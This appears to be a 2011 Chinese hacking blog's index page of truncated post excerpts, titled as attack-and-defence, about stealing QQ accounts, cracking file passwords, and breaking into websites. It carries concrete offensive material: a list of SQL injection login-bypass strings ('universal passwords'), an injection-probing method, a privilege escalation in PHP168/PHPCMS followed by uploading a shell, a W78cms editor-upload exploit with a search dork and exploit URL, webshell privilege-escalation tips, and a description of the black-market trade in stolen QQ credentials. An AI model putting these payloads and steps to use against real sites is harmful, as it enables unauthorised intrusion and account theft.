黑客防攻
QQ木马盗号的阴谋与反阴谋
2011-01-22 11:57
扫描密码的方法不但费时费力,而且成功率极低,盗取QQ最有效的方法还是非木马莫属。木马的入侵我们前面已经探讨过了,被种植木马的主机连管理权限都丧失了,更不用说QQ密码了,当然,使用全面夺取系统的木马来盗取QQ不但小题大做而且无的放矢。事实上,互联网中有许多专门盗取QQ账户和密码的木马,我们将选取影响力较大的QQ木马进行介绍。
(一)揭秘QQ盗号木马
随着杀毒软件与QQ自身的不断升级,一批又一批的QQ盗号木马已经不能使用,尽管旧的木马不能使用,但是新的木马又会出现,正所谓“道高一尺,魔高一丈”,这种“攻”与“防”的较量始终周而复始的进行着。下面我们介绍一款目前比较流行的QQ木马软件
本地破解QQ密码的原理
2011-01-22 11:56
除了在线扫描QQ密码外,我们还应该防范QQ被“本地破解”,所谓“本地破解”是指盗号者在本机中进行的QQ破解操作。
1、本地破解的奥秘
QQ在使用时,会将用户的账号、密码、好友列表、个人信息和聊天记录保存在本地电脑的QQ安装目录中(默认为C:Program...
巧妙破解Word与Excel文档密码
2011-01-22 11:55
为Word文档加密本来无可厚非,但如果过段时间忘记了密码怎么办?虽然已经有各种破解软件,但它们无一例外的采用暴力破解方式,耗费时间且成功率低。本节将采用一种特殊的方法,在几秒内解除Word中的密码,让你的宝贵资料“失而复得”。
一、清除Word密码
在这里我们将利用一款软件-Word Password Recovery...
什么是 QQ信封 ?
2011-01-22 11:54
qq信封
QQ信封是QQ黑市的特殊名词:
QQ信封——一般在许多QQ交易论坛里面都会看见这几个字,所谓的QQ信封就是黑客通过非法手段(放木马,入侵别人电脑,窃取局域网信息)得来的QQ号码和密码,以万为单位保存的信息文本。信封又分为一手信封(原始的,黑客将盗来的QQ号码和密码不经过任何工具,随机储存的),二手信封(已经被黑客工具将里面有价值的号码取出,所剩下的号码)以及N手信封。
洗信——通过一些黑客工具,将一手信里面有价值的号码(号码里面有QB的,无保护的靓号,5,6位的靓号等)筛选出来的过程。...
巧妙清除压缩包文件密码
2011-01-22 11:54
如今针对各种密码的破解工具泛滥成灾,而压缩文件包是大家最常使用恶一种文件,因此更是引起了很多“黑客”的关注,下面看看他们到底有哪些伎俩!
一、压缩文件破解技巧
其实很多软件最初开发的初衷是好的,比如各种远程控制软件,而到了黑客手里就成了远程盗取的工具,这里要介绍的黑客常用的两款压缩文件密码恢复工具也是如此!
1、WinZIP压缩文件的破解
针对WinZIP压缩文件,黑客最常使用的工具就是Elcomsoft公司的“Advanced ZIP Password...
全新的注入点检测方法
2011-01-22 11:53
现在有很多防注入程序屏蔽了 and、1=1、1=2 类似这样的关键字,使用这样的方法有时不能探测到注入点了。
那么是否有新的方法能够探测注入点呢? 经过一段时间的研究,发现了更好的方法。哈哈,特此共享一下。
现在假设有一个新闻页面,URL 是 https://gzkb.goomoo.cn/news.asp?id=123
1. 在浏览器中打开,可以看到一个正常的新闻页面;
2. 在URL地址后面加上-1,URL变成:https://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在...
PHP168 V6.01/6.02权限提升及暴本地路径漏洞
2011-01-22 11:52
PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用
PHPCMS V6.01存在严重的安全问题
注册一个帐户,进入会员中心。
你会看到如下字样。
你现在的级别是普通会员,你将要购买的级别是超级管理员,需要积分0
点击购买,如返回你现在级别是超级管理员等字样。返回会员中心查看一下
然后找到后台登录传shell即可
php爆页面绝对路径
1、加引号'这个最常用
2、变参数类型,比如把id=1改为id=a等...
W78cms网站管理系统0day
2011-01-22 11:51
漏洞很简单,出现在editor上面,大虾应该都知道:
关键词为:inurl:ShopMore.asp?id
访问这个地址
https://xxxxxx.com/nbwebshell/admin/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Hack.asp
访问这个地址可以建立个Hack.ASP的文件夹……
再用这个html代码上传。
<form...
网站的万能密码
2011-01-22 11:50
所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。
对一些我们扫描出后台的网站,我们可以试一下万能密码,或许可能就进去了。当然对于没有此漏洞的网站是无效的。
asp aspx万能密码
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or...
WebShell提权方法大全
2011-01-22 11:49
得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用。
WEBSHELL权限提升技巧
c: d: e:.....
C:\Documents and Settings\All Users\「开始」菜单\程序\
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:\Documents and Settings\All...
条目: 1 - 10 共 10